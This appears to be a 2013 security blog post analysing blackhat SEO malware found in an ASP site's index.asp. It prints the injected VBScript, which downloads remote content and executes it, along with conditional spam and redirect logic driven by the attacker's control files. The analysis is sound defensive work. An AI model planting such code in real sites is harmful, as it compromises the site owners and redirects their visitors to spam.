Blackhat SEO and ASP Sites

It’s all too easy to scream and holler at PHP based websites and the various malware variants associate with the technology, but perhaps we’re a bit too biased.

Here is a quick post on ASP variant. Thought we’d give you Microsoft types some love too.

Today we found this nice BlackHat SEO attack:

Sucuri SiteCheck ASP Malware

Finding it was easy. The bad code was sitting at the beginning of index.asp begging for some attention:

execute body
Public Function GetHtml(url)    
Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")    
ObjXMLHTTP.Open "GET",url,False    
ObjXMLHTTP.setRequestHeader "User-Agent",url    
Set ObjXMLHTTP=Nothing    
set objStream = Server.CreateObject("Adodb.Stream")    
objStream.Type = 1    
objStream.Mode =3    
objStream.Write GetHtml    
objStream.Position = 0    
objStream.Type = 2    
objStream.Charset = "UTF-8"    
GetHtml = objStream.ReadText    
End Function

The code is really straight forward, it creates a function called GetHtml, that downloads the content from httx:// and executes it.

Curious what the code is? Not to worry, it’s nothing more than an ASP variant of some good old conditional malware (image is a snippet).

Sucuri ASP Malware

What I do find very interesting about this code is the following snippet:

Refer= Request.ServerVariables("HTTP_REFERER") '// 父级来源地址
user_agent=Request.ServerVariables("HTTP_USER_AGENT") '//服务器信息

http_host = host
info = Request.ServerVariables("PATH_INFO")

If InStr(http_host,"www") > 0 Then 
end if

base = ""
indexurl = base&"/"&shellsite&"/index.php"

object_str = base&"/"&shellsite&"/object.txt"
if CheckURL(object_str) then
	ret_object = Trim(getHTTPPage(object_str))
end if

Each infected site has its own version of the spam content, only “valid” infected sites will download this spam code. You’ll find that the iframe injection is also there:

jump_str = base&"/"&shellsite&"/jump.txt"
'response.Write jump_str

newcode = 0 '是否是新跳转代码

if Len(ret_object)>3 and CheckURL(object_str) then
	open_urls = base&"/"&ret_object&"/url.txt" '跳转站列表
	'response.Write open_urls
	open_urls = getHTTPPage(open_urls)
	DomainTypeArray = split(open_urls,"|")
	Pathcoun = Ubound(DomainTypeArray)
	RndNumber = INT((Pathcoun+1)*RND)
	'response.Write DomainTypeArray(RndNumber)
	if instr(DomainTypeArray(RndNumber),"www")>0 then
		open_url = ""
		open_url = ""
	end if
	newcode = 1
	open_url = base&"/"&shellsite&"/url.txt" '唯一跳转代码
end if

It’s a good dynamic control of what to inject in the sites code.

In short, all this to say, ASP is no better than PHP, there are equal number of variants on both technologies. We just write more about PHP as it’s one of the most prevalent technologies being consumed by everyday website owners, and their lovely Content Management Systems (CMS).

Oh, and did anyone else notice, what appears to be, Chinese :) … ummmm….. ;P

Read more: Blackhat SEO and ASP Sites

Story added 6. November 2013, content source with full text you can find at link above.